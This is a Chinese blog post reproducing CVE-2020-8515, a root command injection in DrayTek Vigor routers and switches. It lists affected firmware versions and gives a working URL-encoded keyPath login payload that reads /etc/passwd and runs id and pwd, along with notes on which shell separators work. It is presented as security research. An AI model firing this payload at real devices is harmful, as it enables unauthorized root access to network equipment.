Draytek企业网络设备命令注入复现(CVE-2020-8515)

v2-67158082b3e5c2483dafb55a27025a78_b.jpg


一、漏洞描述

DrayTek URI未能正确处理SHELL字符,远程攻击者可以利用该漏洞提交特殊的请求,可以ROOT权限执行任意命令。

远程命令注入漏洞被标记为CVE-2020-8515,主要影响了DrayTek Vigor网络设备,包括企业交换机、路由器、负载均衡器和VPN网关。

二、影响范围

Vigor2960 < v1.5.1

Vigor300B < v1.5.1

Vigor3900 < v1.5.1

VigorSwitch20P2121 <= v2.3.2

VigorSwitch20G1280 <= v2.3.2

VigorSwitch20P1280 <= v2.3.2

VigorSwitch20G2280 <= v2.3.2

VigorSwitch20P2280 <= v2.3.2

三、漏洞复现

登录界面登录burp抓包:


v2-f3d83ec6d0c3a5a1fec977da3622541a_b.jpg


抓取登录数据包添加keypath的paylod的字段

payloay:

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a

在这个基础上继续研究了本漏洞支持其他可以执行的命令:

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a

shell方面,因为输入的命令是由mainfunction.cgi解析的,所以空格会被替换为“+”(存在一些困难)。

注入点涉及keyPath和rtick,和/www/cgi-bin/mainfunction.cgi文件有关,对应的web服务程序为/usr/sbin/lighttpd

主要是&符号的执行,可以进行拼接,但是|、;就不行

python脚本验证:


v2-f17296d8da166c5b85291d827b3d5101_b.jpg


四、参考链接:

nosec.org/home/detail/4

cve.mitre.org/cgi-bin/c

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

公众号:


v2-08401c1e12264d737138ad072495622d_b.jpg


thelostworld:


v2-c63907909925385c02bd103dd075d597_b.jpg


个人知乎:zhihu.com/people/fu-wei

个人简书:jianshu.com/u/bf0e38a8d

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值